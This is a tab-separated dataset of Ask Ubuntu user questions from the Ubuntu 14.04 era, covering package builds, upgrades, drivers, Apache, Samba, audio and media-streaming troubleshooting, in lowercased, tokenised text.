452235	building packages success in my machine but fails on launchpad ppa	i 'm trying to build budgie-desktop debian packages and upload it to my launchpad ppa . building packages success in my machine but fails on launchpad ppa ( with the following errors ) make [ 2 ] : entering directory `/build/buildd/budgie-desktop-2.0/session' makefile:516 : ../data/.deps/budgie_session_dialog-budgie-session-dialog-resources.po : no such file or directory make [ 2 ] : *** no rule to make target `../data/.deps/budgie_session_dialog-budgie-session-dialog-resources.po ' . stop . make [ 2 ] : leaving directory `/build/buildd/budgie-desktop-2.0/session' make [ 1 ] : *** [ distclean-recursive ] error 1 make [ 1 ] : leaving directory `/build/buildd/budgie-desktop-2.0' dh_auto_clean : make -j1 distclean returned exit code 2 make : *** [ clean ] error 2 dpkg-buildpackage : error : /usr/bin/fakeroot debian/rules clean gave error exit status 2 you can check out the full log in the following build status [ build status ] amd64 build : https : //launchpad.net/~sukso96100/+archive/budgie-desktop/+build/5924020 i386 build : https : //launchpad.net/~sukso96100/+archive/budgie-desktop/+build/5924021 what should i do to solve this problem ?
452236	ca n't create unity lens with ubuntu 14.04	i want create a unity lens , i follow this exemple : http : //developer.ubuntu.com/2012/04/how-to-create-a-wikipedia-unity-lens-for-ubuntu/ i use : quickly create unity-lens wikipedia when i try : quickly install i have this error : morgan @ morgan-laptop : ~/wikipedia $ sudo quickly install traceback ( most recent call last ) : file `` /usr/share/quickly/templates/unity-lens/install.py '' , line 62 , in < module > os.mkdir ( '/usr/share/unity/lenses/ % s ' % lens_name ) oserror : [ errno 2 ] no such file or directory : '/usr/share/unity/lenses/wikipedia' erreur : la commande install a échoué annulation so , i create a directory ( thanks to : https : //bugs.launchpad.net/singlet/+bug/1100114 ) : mkdir /usr/share/unity/lenses and when i try to install again : quickly install i have this error : congrats , your new lens has been installed . compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity warn 2014-04-22 14:45:00 unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'org.gnome.shell ' yet as we do n't have a connection , waiting for it ... error 2014-04-22 14:45:00 unity.debug.interface debugdbusinterface.cpp:196 unable to load entry point in libxpathselect : libxpathselect.so.1.4 : ne peut ouvrir le fichier d'objet partagé : aucun fichier ou dossier de ce type error 2014-04-22 14:45:00 unityinit < unknown > :0 unable to create file '/home/morgan/.cache/dconf/user ' : permission non accordée . dconf will not work properly . error 2014-04-22 14:45:00 unityinit < unknown > :0 unable to create file '/home/morgan/.cache/dconf/user ' : permission non accordée . dconf will not work properly . error 2014-04-22 14:45:00 unityinit < unknown > :0 unable to create file '/home/morgan/.cache/dconf/user ' : permission non accordée . dconf will not work properly . error 2014-04-22 14:45:00 unity.launcher.entry.remote.model launcherentryremotemodel.cpp:50 unable to connect to session bus : impossible de se connecter : connexion refusée crit 2014-04-22 14:45:00 unity < unknown > :0 unable to get org.ayatana.bamf matcher : impossible de se connecter : connexion refusée trace/breakpoint trap ( core dumped ) what is the new way to create a unity lens ?
452239	ubuntu 14.04 64bit chromium does n't work	chromium does n't start , so tried to reinstall . but the problem is still there . same problem with synaptic package manager . maybe other programs i have n't tried .
452240	ubuntu 14.04 asks to downgrade packages ?	i 'm new to ubuntu , so please excuse any naive questions . after a fresh install of 14.04 , i was adding apps from the software center , but most of them continued to fail because `` package dependencies could not be resolved '' . here is an example for trying to install guake : guake : depends : libc6 ( > = 2.4 ) but 2.19-0ubuntu6 is to be installed depends : libglib2.0-0 ( > = 2.12.0 ) but 2.40.0-2 is to be installed depends : libgtk2.0-0 ( > = 2.24.0 ) but 2.24.23-0ubuntu1 is to be installed depends : libpython2.7 ( > = 2.7 ) but 2.7.6-8 is to be installed depends : python ( > = 2.7.1-0ubuntu2 ) but 2.7.5-5ubuntu3 is to be installed after trying a variety of things with apt-get ( update , clean , install -f , etc . ) , i saw a suggestion to install aptitude . but , now aptitude suggests that i should downgrade my packages : downgrade the following packages : 1 ) python-gtk2 [ 2.24.0-3ubuntu3 ( now ) - > 2.24.0-3ubuntu1 ( saucy ) ] this seems to be asking me to downgrade to the version of the previous ubuntu version ( saucy salamander ) , and similarly for most apps that i 'm trying to install . what should i do ? downgrade the packages ? or just install ubuntu 13.10 ? ps : my software sources are the default ones + canonical partners .
452241	mounting a filesystem ?	i know how to use mounting in linux and have used it many a times but i am not able to understand what mount actually means in operating system , its benefits and practical usage ? i have searched it on various sites but could not find useful links ?
452243	what versions of ruby are supported in 14.04 ?	i 'm finding the task of installing ruby 2.0 on the latest ubuntu 14.04 rather frustrating . i 'm aware that i could forgo the packages and install from source - but i 'd far rather install a package - if that is possible . i found this question/answer about ruby on 13.10 - which looked like what i wanted . how to install ruby ? unfortunately , the strategy does n't seem viable - the ruby-switch package has been deleted in 14.04. http : //www.ubuntuupdates.org/package/core/trusty/universe/base/ruby-switch the deletion of the package references a bug which , to me , looks entirely unrelated . i 'm bemused about why installing ruby2.0 using apt-get installs ruby1.9 and makes it the default ruby interpreter . i do get a ruby2.0 binary - but scripts ( which depend upon a 2.0 interpreter when executing ruby ) do n't pick it up . furthermore , when i use gem et . al . to install ruby packages - these seem to be installed for ruby1.9 rather than 2.0 . very unsatisfactory . can anyone offer a hint as to the 'best ' ( i.e . most straightforward ) way to install ruby 2.0 as the standard ruby interpreter in ubuntu 14.04 ? how am i expected to switch from ruby 1.9 to 2.0 without ruby-switch ? update : a bit of delving suggests that ruby-switch has been deprecated because ruby is not supported by update-alternatives , on which ruby-switch depended . is this a bug with the ruby-install , or a bug with update-alternatives - or a choice made by ubuntu ? if the latter , i 'd like to know how to use enable /usr/bin/ruby2.0 from the ruby2.0 package as the system default ruby for scripts and gem installs .
452245	gksudo nautilus error - ubuntu 14.04	i installed gksudo on ubuntu 14.04 lts and when i run nautilus with gksudo gksudo nautilus it asks for password , then gives error and then crashes ( nautilus:19688 ) : glib-gobject-warning ** : invalid cast from 'gtkmessagedialog ' to 'nautiluswindow' ** error : nautilus-window.c:2116 : nautilus_window_get_slots : assertion failed : ( nautilus_is_window ( window ) ) though sudo nautilus seems to work fine thanks in advance well , the problem has stopped occurring and gksudo nautilus works just fine . and i have absolutely no idea why this happened . any insight on what my original problem was and how it got solved is highly appreciated . again thanks in advance .
452248	how to install ubuntu 14.04 on specific partition ?	i am installing ubuntu 14.04 from bootable dvd . after choosing something else option , it does n't show my current partition table and it is necessary to create new partition table . so , how to use my current partition table to install ubuntu on specific drive without losing data of other partitions ?
452251	getting list of packages from recovery	i have a copy of ubuntu that wo n't boot into the gui , how can i get a list of the installed packages on the system so i can drop it into another system ? i tried using dpkg -- get-selections from recovery but i get dpkg-query : error : failed to open package info file '/var/lib/dpkg/status ' for reading : no such file or directory
452252	how to make hitting delete key delete file on not-ubuntu partition ?	ubuntu automatically recognizes and mounts my windows partition , where i store many of my files . however , when opening a folder on this partition in nautilus , nothing happens , while doing so on the ubuntu partition moves the files to the bin . i would expect the 'permanently delete ? ' warning ( as i do get when doing 'right click - delete ' ) . is there a way to change this ? ( also if it 's normal behaviour ) if so , how ?
452254	main user login has no gui	after i upgrades from 10.04 to 12.04 i can not login to my main users account . before the upgrade i had created another administrative user but had never used that account with the gui . that other user has no problems logging in . guest , which i never used before this problem , can login without a problem . only the main user has the problem . at first the xauthority file was owned by root , so it would just return to the lightdm login screen . but after researching that problem i removed that file . now when i enter the main user 's password the gui seems to load a little . the mouse appears but all i get is a terminal , without any boarder , in the upper left corner . only when i move the mouse into that upper left corner can i type commands . any command works fine . when i type exit it returns to the lightdm login screen . i tried comparing the /var/log/xorg.0.log file after logging in with the alternate admin account and the main account but it every line starts with a different number . the .xsession-error file had no additional help .
452255	please help me with 32bit libs for 64 bit	how i can fix this problem with `` portal '' ? i have only used ubuntu for a few days ( ubuntu 14.04 ) . appframework : unable to load module vguimatsurface.so ! unable to load interface vgui_surface030 from vguimatsurface.so
452256	ca n't update 14.04 from 13.10 from software updater	i ca n't update ubuntu 14.04 from 13.10 in software updater . it shows 'the software on this computer is up to date ' . when i click on 'upgrade ' , it ask for administrator password , then the window vanish and nothings happens next . i have done this for n number of times .
452257	how to restrict ubuntu to only show lts updates	i have installed ubuntu 14.04 lts last week . now i dont want to update daily for all the newly available updates , i want to restrict updates to only lts updates . so i have seleted `` for long-terms supports versions '' for notify me for new ubuntu version dropdown in updates tab in `` softwares and updates '' window . am i correct in these steps ? another question is how frequently updates are released for a lts , is it as frequently as daily ubuntu updates available for `` for any new version '' ? anyone can help me , answer my queries ? please ...
452260	upgrading from ubuntu 14.04 to kubuntu	i have an issue with installing kde on my ubuntu 14.04 . i executed apt-get install kubuntu-desktop and tried to remove unity sudo apt-get autoremove -- purge unity unity-common unity-services unity-lens-\* unity-scope-\* unity-webapps-\* gnome-control-center-unity hud libunity-core-6\* libunity-misc4 libunity-webapps\* appmenu-gtk appmenu-gtk3 appmenu-qt\* overlay-scrollbar\* activity-log-manager-control-center firefox-globalmenu thunderbird-globalmenu libufe-xidgetter0 xul-ext-unity xul-ext-webaccounts webaccounts-extension-common xul-ext-websites-integration gnome-control-center gnome-session next i chose kdm as default desktop manager . but now every time i logging in on kdm login screen all i see is empty default kde wallpaper .
452265	why does hibernate not work after update from 13.10 to 14.04 ?	i have just updated my xubuntu 13.10 to 14.04 . did not change anything . suspend-to-ram ( standby ) and hibernate both worked well in 13.10 . now hibernate does not work any more ( suspend-to-ram still works ) . the machine seems to suspend to disk , but after a restart , i just get a blank screen and the hard drive is running ... what can i do ? edit 06/19/2014 : after two months of investigation ( no one could solve the problem so far ) , i found that under the newest debian ( xfce ) with kernel 3.2.0 hibernation works correctly . the same holds for linux mint debian edition ( lmde-201403 ) , which is based on debian . hibernation does not work under the newest linux mint 17 `` qiana '' , which is based on ubuntu , nor under the newest fedora 20 , nor under xubuntu 14.04 . they all have a kernel version around 3.13.0 . so my conclusion is that there is something wrong or misconfigured with the newest kernels , and since the distributions that are not directly based on debian use the newest kernels , their hibernation does not work correctly , whereas the debian kernels do work .
452267	opening files created in windows 7	i have nvq work i done on windows i have now put them on linux what app do i need to read them please . i havent done anything as im 100 % new to this and im finding it very very complicated
452268	extract subtitle from mkv files	the problem is that videoplayers in ubuntu have a problem with integrated central european subtitles.the solution is to extract them . does anyone knows if there is a command in the terminal or program to extract the subtitle from a mkv file ?
452269	upgrade aborts half-way through with the error message there is too little space in the /boot folder	i have tried to run the updater to install 14.04 . it aborts half-way through with the error message there is too little space in the /boot folder . it recommends emptying the trash and running apt-get clean . i emptied the trash and ran apt-get clean , but this apparently accomplished nothing . same problem . inspecting the /boot folder seems to show there are a lot of older files left over from interim updates , but since i do n't know what may be vital , i have n't attempted deletion . is apt-get clean broken ? and if so , is my only recourse a clean install ? that would be annoying .
452270	trouble downloading packages	when i try to download any of the following package , it shows error . sudo apt-get install libelf-dev sudo apt-get install tcl-dev sudo apt-get install tk-dev reading package lists ... building dependency tree ... reading state information ... e : unable to locate package tk-dev and so on .
452271	installing a partition of windows 8 alongside ubuntu	i originally had a laptop with windows 8 , but i wiped it and installed strictly ubuntu . however , i am realizing that there are some tasks that are better suited towards windows . i was looking to dual boot and install windows 8 on a small partition alongside my ubuntu , however , i would rather not lose grub , and last time i dual booted , i seemed to have messed up the boot order in my bios . so do you ladies and gentlemen have and advice to me on how to successfully complete this task ? perhaps a tutorial you know of . i have seen many that are suited towards installing ubuntu after windows is already present , but i was hoping for the inverse . thanks everyone !
452278	just guest session available , can not login	i 'm desperately trying to login into ubuntu 12.04 lts . after boot i see the guest session asking for my password . after login it appears a black screen for just a half second and i will redirect to the previous login screen . yesterday , i installed a ppa for gvfs and gvfs itself via apt but that did n't work correctly so i removed both . after reboot , the described situation started . i checked the gvfs package and tried a lot of recommended commands and finally it seems to be fixed . furthermore , i reinstalled my nvidia drivers and deleted this .xauthority file in my home folder . every clue is welcome ! update : also deleted /tmp/.x0-lock . did n't help
452282	arista transcoder not working	in previous versions of ubuntu , i was installing and using arista transcoder seamlessly with no problems at all . after upgrading to ubuntu 14.04 and installing arista , whenever i try to transcode any video , the following error message appears python2.7-minimal requires an additional plugin for this operation . the following plugin is required : gstreamer element ffdeinterlance do you want to search for this now ? when i press `` search '' , the following error message appears : can not add conversion to queue because of missing elements ! any idea how to solve this problem ?
452288	ubuntu 12.04.3 lts retaining screen brightness	is it possible that ubuntu retains screen brightness settings used in the previous session after the computer is turned off . if so how can i achieve this effect ?
452290	virtualbox on ubuntu 14.04 to run an existing windows 7 install	ok ... here 's what i am looking to do . i have completely fallen head over heels in love with linux over the last few years ... however , being a developer i have always needed to have my development/coding machine be a windows box . so i can have visual studio , office , sql server , etc installed for my development processes . i really want to convert this machine into a ubuntu desktop ... like ... badly . so , my real question to the community is : can i take a snapshot of my current windows install , and convert it to a virtual machine for use in virtualbox once i get ubuntu installed , and how ? and because ... i do n't want to have to re-install all my windows software from scratch ...
452291	ubuntu 14.04 software center sync does n't work	i just put a fresh install of ubuntu 14.04 on my desktop and laptop . but i ca n't get the software center sync to work . i clicked file , sync between computers and on each computer i see the own system , but not the other . in the bottom it says 'to sync with another computer , choose `` sync between computers '' from that computer . ' i already did that . how does software center sync between computers ? does it still use ubuntu one for this ? in other posts on this forum i found reference to that . but one will be closed down , so i canceled my one account ... opening https : //software-center.ubuntu.com/subscriptions/ gives me a list of purchased software , that i can also see in software center itself . i hope someone can give me a clue where to look for the problem .
452295	ubuntu upgrade to 14.04 does n't show after interrupted attempt	i tried to update from ubuntu 12.04 to 14.04 using the update-manager . but the upgrade process stopped midway due to insufficient disk space . i cleared up enough space , and tried to resume by sudo update-manager -d but the update manager does n't show the upgrade to ubuntu 14.04 option anymore . i tried the following sudo apt-get autoremove sudo apt-get clean sudo apt-get update & & sudo apt-get dist-upgrade none of these help . please help . when i do lsb_release -a now , i get lsb version : core-2.0-ia32 : core-2.0-noarch : core-3.0-ia32 : core-3.0-noarch : core- 3.1-ia32 : core-3.1-noarch : core-3.2-ia32 : core-3.2-noarch : core-4.0-ia32 : core-4.0- noarch distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise
452297	possible memory leak on ubuntu 10.04 lts	i am having an memory issue with one of my ubuntu servers which is running as a vm through vmware esxi . the servers primary function is an email server , running sendmail and dovecot , with squirrelmail and roundcube as the web clients . it also runs our staff intranet page using wordpress . we have approximately 50 users on this page at any given time . the same goes for the email clients . i have been having issues with it locking up since i upgraded to 10.04 from ubuntu 8 hardy . if i reboot the server , ( i have 3gb allocated to this vm ) , the memory is freed up , but starts to slowly get more and more used up . this will happen until the server locks up , which is obviously ideal . here is a screen capture of my htop command : here is my free -m command : the two show different percentages , so i 'm confused on what to do next .
452301	right-ctrl key not supported in kubuntu 14.04 ?	in my fresh install of kubuntu 14.04 , i ca n't use anymore the ( pretty useful ) shortcut to move along words : ( right ) ctrl + left ( or right ) arrow . the left-control key is working fine . if i try to add a secondary shortcut for this action in system settings > shortcuts & gestures > standard shortcuts > forward one word , i got an error popup saying : this key is not supported by qt my keyboard did n't change , it 's a basic french azerty 101 keys . is there a trick to configure something somewhere ?
452303	streaming video files to ps3	project : i would like to stream my home dvds to my ps3 system using rygel . a ) i would like to use handbrake to produce exceptional copies of my home dvd 's in the .mkv format ( or if an experienced user in dvdripping/transcoding could suggest a better solution in either dvd : :rip or handbrake i am willing to listen , space is not a concern ) . b ) share and stream those movies from my ubuntu 14.04 pc to my ps3 system , preferrably by using rygel as opposed to ps3mediaserver . dvd ripping programs used so far : dvd : :rip excellent ripping , produces exceptional .vob copies of dvds . not able to control default language , most dvd 's produce multiple .vob files , some are english some are french and of course some are spanish . when i use vlc to view the files i am able to set the audio track to the appropriate one ( english ) , hinting that all audio streams are there but not being accessed properly ( for lack of better words ) . this is not the case when accessing through rygel on the ps3 system , as well this setting is not available on the ps3 system i believe ( either way , it would still be irritating having to constantly switch the tracks ) . transcoding is probably where i am going wrong , i am aware of the different container formats and codecs although i do not know all the technical specifications that seem to be required to produce exceptional .avi or .mpg4 files similar to the .vob that dvd : :rip produced in the first place . handbrake love the simplicity , appears to produce exceptional .mkv formats ( does not seem to be a native media format on ps3 systems . dlna compliant servers ps3mediaserver oh wow , the problems so far ... .. there was a time when this worked flawlessly for me ... ..sigh . other than that seems to work as it should but when i stream my movie i get one of two errors . either the standard 800288e1 error on the ps3 system or the movie comes in as it should ( quality wise ) but the sounds is just loud static . played the same file through rygel and it works as it should ( quality wise ) and with the normal sound . i tested the avi file locally on the ps3 system and it plays fine which suggests a transcoding error . here is the error when the movie fails to play completely incase someone may know how to fix it . hopefully it is the relevant data . info 2014-04-21 13:27:42.263 [ pool-15-thread-1 ] at java.lang.thread.run ( thread.java:744 ) info 2014-04-21 13:27:45.671 [ new i/o server worker # 1-2 ] starting transcode/remux of zohan-001.avi error 2014-04-21 13:27:45.855 [ mencoder-3 ] error initializing process : java.io.ioexception : can not run program `` mencoder '' : error=2 , no such file or directory at java.lang.processbuilder.start ( processbuilder.java:1041 ) ~ [ na:1.7.0_51 ] at net.pms.io.processwrapperimpl.run ( processwrapperimpl.java:183 ) ~ [ pms.jar:1.90.1 ] caused by : java.io.ioexception : error=2 , no such file or directory at java.lang.unixprocess.forkandexec ( native method ) ~ [ na:1.7.0_51 ] at java.lang.unixprocess. < init > ( unixprocess.java:135 ) ~ [ na:1.7.0_51 ] at java.lang.processimpl.start ( processimpl.java:130 ) ~ [ na:1.7.0_51 ] at java.lang.processbuilder.start ( processbuilder.java:1022 ) ~ [ na:1.7.0_51 ] ... 1 common frames omitted warn 2014-04-21 13:27:45.952 [ new i/o server worker # 1-2 ] external input stream instance is null ... sounds not good , waiting 500ms warn 2014-04-21 13:27:46.453 [ new i/o server worker # 1-2 ] external input stream instance is null ... sounds not good , waiting 500ms warn 2014-04-21 13:27:46.954 [ new i/o server worker # 1-2 ] external input stream instance is null ... sounds not good , waiting 500ms warn 2014-04-21 13:27:47.455 [ new i/o server worker # 1-2 ] external input stream instance is null ... sounds not good , waiting 500ms warn 2014-04-21 13:27:47.956 [ new i/o server worker # 1-2 ] external input stream instance is null ... sounds not good , waiting 500ms warn 2014-04-21 13:27:48.458 [ new i/o server worker # 1-2 ] external input stream instance is null ... sounds not good , waiting 500ms warn 2014-04-21 13:27:48.959 [ new i/o server worker # 1-2 ] external input stream instance is null ... sounds not good , waiting 500ms warn 2014-04-21 13:27:49.460 [ new i/o server worker # 1-2 ] external input stream instance is null ... sounds not good , waiting 500ms warn 2014-04-21 13:27:49.961 [ new i/o server worker # 1-2 ] external input stream instance is null ... sounds not good , waiting 500ms warn 2014-04-21 13:27:50.462 [ new i/o server worker # 1-2 ] external input stream instance is null ... sounds not good , waiting 500ms error 2014-04-21 13:27:50.964 [ new i/o server worker # 1-2 ] there is no inputstream to return for zohan-001.avi - [ mencoder video ] rygel works great , simple to use and the rygel preferences app makes things easy to share directories . wont stream the .mkv files though . i run rygel from the terminal so here is there error when i try to stream an mkv file through rygel scruffy @ scrffy11 : ~ $ rygel rygel-message : rygel-main.vala:87 : rygel v startingâś ^cscruffy @ scrffy11 : ~ $ rygel rygel-message : rygel-main.vala:87 : rygel v startingâś rygel-message : new plugin 'mediaexport ' available mediaexport-message : 'file : ///home/scruffy/videos ' harvested mediaexport-message : 'file : ///home/scruffy/dvdrip-data ' harvested rygel-message : rygel-thumbnailer.vala:132 : no d-bus thumbnailer available ( rygel:7914 ) : glib-critical ** : source id 793 was not found when attempting to remove it ( rygel:7914 ) : rygel-warning ** : rygel-http-request.vala:105 : could not create a transcoder configuration . your gstreamer installation might be missing a plug-in so to me it says it all right there , rygel executes gstreamer and an appropriate plug-in for the transcoding but i appear to be missing a plug-in . so i found out that i need the mastrokamux plugin for gstreamer which is in an apparent `` good '' category ( not sure how to find out what plugins i may have already or how to get new ones ) . so here 's the general problems that i hope someone may be able to help with . how do i add the mastrokamux plugin ( codec ) to gstreamer ? a . is this possible without having to rebuild ( recompile ) gstreamer ? even if i successfully add the mastrokamux plugin will rygel know how to call it ? or will i need to also recompile that as well ? so in summary : a ) i would like to use handbrake to produce exceptional copies of my home dvd 's in the .mkv format ( or if an experienced user in dvdripping/transcoding could suggest a better solution in either dvd : :rip or handbrake i am willing to listen , space is not a concern ) . b ) share and stream those movies from my ubuntu 14.04 pc to my ps3 system , preferrably by using rygel as opposed to ps3mediaserver . sounded like a simple project ... what happened ? ; )
452305	ubuntu 14.04 : touch pad scroll direction is wrong on dell latitude and lenovo thinkpad	i have installed 14.04 recently in my dell latitude e6410 . touch pad scroll working seems to be incorrect . inverted direction . i checked this on lenovo thinkpad also , there also i have observed the same . expects a positive response soon . thanks .
452306	samba , shared folders and windows 8	i 've ubuntu 13.10 and another pc with windows8 . i use an external drive on ubuntu and tried to share it to have access on windows8 . i 've installed samba . the problem in on windows side . i can see the share folders on ubuntu but one i double click it says that windows ca n't access to ubuntu . if i try to map a folder , i log on with the user setted on samba , it trys to establish the connections and then reports an error saying that the speciefied folder is using another user and password . i also did another test that was to create a folder on the ubuntu desktop and share it and on windows i can access to this folder with any problem . also i tried to share the external drive from properties ( like i did it in the other folder ) but without success . can anyone help me please ?
452308	apache not working ( showing empty folders or 404 )	i have updated ubuntu to 14.04 and apache stops working . i have reinstalled apache and all dependencies with no success . when i enter localhost i see apache indexing the www/ folder but it is empty ( although i have several files and folders ) . when i type in a folder i know it exists , i get a 404 . this is the error.log output : juan @ juan-te5 : /var $ tail /var/log/apache2/error.log [ mon apr 21 14:46:48.899984 2014 ] [ mpm_prefork : notice ] [ pid 21861 ] ah00163 : apache/2.4.7 ( ubuntu ) configured -- resuming normal operations [ mon apr 21 14:46:48.900108 2014 ] [ core : notice ] [ pid 21861 ] ah00094 : command line : '/usr/sbin/apache2' [ mon apr 21 14:46:50.326343 2014 ] [ mpm_prefork : notice ] [ pid 21861 ] ah00169 : caught sigterm , shutting down [ mon apr 21 14:46:51.650818 2014 ] [ mpm_prefork : notice ] [ pid 21937 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4 configured -- resuming normal operations [ mon apr 21 14:46:51.650896 2014 ] [ core : notice ] [ pid 21937 ] ah00094 : command line : '/usr/sbin/apache2' this happens when i type in apache2 juan @ juan-te5 : /var $ apache2 [ mon apr 21 14:50:24.933493 2014 ] [ core : warn ] [ pid 22112 ] ah00111 : config variable $ { apache_lock_dir } is not defined [ mon apr 21 14:50:24.933700 2014 ] [ core : warn ] [ pid 22112 ] ah00111 : config variable $ { apache_pid_file } is not defined [ mon apr 21 14:50:24.933734 2014 ] [ core : warn ] [ pid 22112 ] ah00111 : config variable $ { apache_run_user } is not defined [ mon apr 21 14:50:24.933749 2014 ] [ core : warn ] [ pid 22112 ] ah00111 : config variable $ { apache_run_group } is not defined [ mon apr 21 14:50:24.933788 2014 ] [ core : warn ] [ pid 22112 ] ah00111 : config variable $ { apache_log_dir } is not defined [ mon apr 21 14:50:24.941240 2014 ] [ core : warn ] [ pid 22112 ] ah00111 : config variable $ { apache_log_dir } is not defined [ mon apr 21 14:50:24.941401 2014 ] [ core : warn ] [ pid 22112 ] ah00111 : config variable $ { apache_log_dir } is not defined [ mon apr 21 14:50:24.941419 2014 ] [ core : warn ] [ pid 22112 ] ah00111 : config variable $ { apache_log_dir } is not defined ah00526 : syntax error on line 74 of /etc/apache2/apache2.conf : invalid mutex directory in argument file : $ { apache_lock_dir }
452311	video not playing from either a file or from the library	please forgive an aging noob , just when i take the time to admire what i 've learned i seem to fall further behind than where i was in the first place ! i recently created a usb key with ubuntu 12.04.04 on it . i boot my dell inspiron 6000 using the usb key and have no problem getting it to work in `` try ubuntu '' mode . i 'm not redy to try a full install yet ( more on this below ) . i 'm using the laptop and usb mouse for entry and screen navigation . i installed xbmc from the application center , and i am able to generate a library of all my videos ( stored on a nas on my network ) and xbmc seems to be able to use the built in scapers to get artwork and movie details . i pointed xbmc to them using nfs as the source . i 've gone as far as changing the default look and layout ( so titles appear as tiles , similar to netflix ) . everything looks good . this is where is starts to fail on me . i ca n't seem to make any video ( or music for that matter ) play . i click on a title , i get the `` working '' icon at the bottom right , but shortly thereafter the icon disappears and ubuntu ( or at least xbmc ) hangs and wo n't do anything . ca n't move the cursor , ca n't exit . only option is to hard boot the laptop . am i missing something ? do i have to do a working install to make it fully functional ? thanks in advance . jr other info : dell inspiron 6000 , wired network , 4gb ram , 1.7ghz processor
452312	how to find out which packages have been installed from .deb files	i 've previously installed some packages from .deb files using gdeb . i 've now forgotten which ones . as i will soon update from precise to trusty , i 'd like to uninstall them & go back to the standard precise repo ones before upgrading : then i will find out if apps dependent on these packages work before considering installing them from .deb files . i think that i remember that this could be done using synaptic . anybody know how ?
452313	how to check the number of fields given to the `read` command ?	i have a quick question relating to $ # in the shell scripts . so , i can use $ # at the command line to check the number of a shell script arguments given by the user . example : # ./shellscript varone vartwo # $ # > 2 < -- so output 2 here reflects varone and vartwo is any command i can use for read command ? for example : # ! /bin/bash read -p `` please input value '' var1 var2 echo $ # < -- however here will return 0 even user input two values at command line is any other command i can use here to return 2 so that i can perform a check on the user 's input variables ? like : [ $ # -lt 2 ] & & echo `` failed ''
452314	no sound in ubuntu 12.04 but in windows i t is enabled	**i tried this but..** meena @ ubuntu : ~ $ gnome-volume-control-applet gnome-volume-control-applet : command not found **when i tried this** meena @ ubuntu : ~ $ pulseaudio -vvv i : [ pulseaudio ] main.c : setrlimit ( rlimit_nice , ( 31 , 31 ) ) failed : operation not permitted i : [ pulseaudio ] main.c : setrlimit ( rlimit_rtprio , ( 9 , 9 ) ) failed : operation not permitted d : [ pulseaudio ] core-rtclock.c : timer slack is set to 50 us . d : [ pulseaudio ] core-util.c : realtimekit worked . i : [ pulseaudio ] core-util.c : successfully gained nice level -11 . i : [ pulseaudio ] main.c : this is pulseaudio 2.0 d : [ pulseaudio ] main.c : compilation host : x86_64-pc-linux-gnu d : [ pulseaudio ] main.c : compilation cflags : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security -werror=format-security -wall -w -wextra -pipe -wno-long-long -wvla -wno-overlength-strings -wunsafe-loop-optimizations -wundef -wformat=2 -wlogical-op -wsign-compare -wmissing-include-dirs -wformat-nonliteral -wpointer-arith -winit-self -wdeclaration-after-statement -wfloat-equal -wmissing-prototypes -wredundant-decls -wmissing-declarations -wmissing-noreturn -wshadow -wendif-labels -wcast-align -wstrict-aliasing -wwrite-strings -wno-unused-parameter -ffast-math -wp , -d_fortify_source=2 -fno-common -fdiagnostics-show-option d : [ pulseaudio ] main.c : running on host : linux x86_64 3.11.0-19-generic # 33~precise1-ubuntu smp wed mar 12 21:16:27 utc 2014 d : [ pulseaudio ] main.c : found 1 cpus . i : [ pulseaudio ] main.c : page size is 4096 bytes d : [ pulseaudio ] main.c : compiled with valgrind support : no d : [ pulseaudio ] main.c : running in valgrind mode : no d : [ pulseaudio ] main.c : running in vm : no d : [ pulseaudio ] main.c : optimized build : yes d : [ pulseaudio ] main.c : fastpath defined , only fast path asserts disabled . i : [ pulseaudio ] main.c : machine id is 7b8232b6ba07638f76b5a55f0000002c . i : [ pulseaudio ] main.c : session id is 7b8232b6ba07638f76b5a55f0000002c-1398097050.453488-247502429 . i : [ pulseaudio ] main.c : using runtime directory /home/meena/.pulse/7b8232b6ba07638f76b5a55f0000002c-runtime . i : [ pulseaudio ] main.c : using state directory /home/meena/.pulse . i : [ pulseaudio ] main.c : using modules directory /usr/lib/pulse-2.0/modules . i : [ pulseaudio ] main.c : running in system mode : no e : [ pulseaudio ] pid.c : daemon already running . e : [ pulseaudio ] main.c : pa_pid_file_create ( ) failed . when i tried this meena @ ubuntu : ~ $ sudo gnome-control-center [ sudo ] password for meena : home directory /home/meena not ours . ( gnome-control-center:3276 ) : sound-cc-panel-warning : failed to connect context : ok * bug * in pixman_region32_init_rect : invalid rectangle passed set a breakpoint on '_pixman_log_error ' to debug home directory /home/meena not ours . home directory /home/meena not ours . please kindly help me fix this problem iam not getting sound only in ubuntu in windows i have no issues related to this which is the other os i am using
452315	problems with realtek rtl8188ee on 14.04	i am having a wireless issue with my mothers laptop , just installed ubuntu 14.04 because i 'm tired of removing malware from her laptop and now the wireless card wont work . this is the first time i 've ever had problem with this and i 'm not finding anything for 14.04 , the card is the realtek rtl8188ee , the computer is a toshiba satellite c55-a , it works hardwired to my router and with a cheap no name 802.11g dongle i had lying around . thing is it was connected during the initial installation , but after it rebooted it stopped working and ca n't figure it out
452317	dhcp and static ip address simultaneously in ubuntu	we can use multiple ip address for a single interface in linux ( eth0:0 , eth0:1 ) . but can we use dhcp and static ip in the same time ? ? eth0:1 should have a static ip address and eth0:0 will be configure using dhcp ? ?
452321	runescape fullscreen problem	when i 'm playing runescape on the linux client when i log in and try to go to fullscreen it would do this : just to clear things up : yes i have a membership
452324	wired ethernet issue on ubuntu 14.04 running on lenovo x230 on	i am running ubuntu 14.04 on a lenovo x230 laptop . while the wireless connections work , it does not connect to the wired internet . any hints are greatly appreciated . thanks , shashi
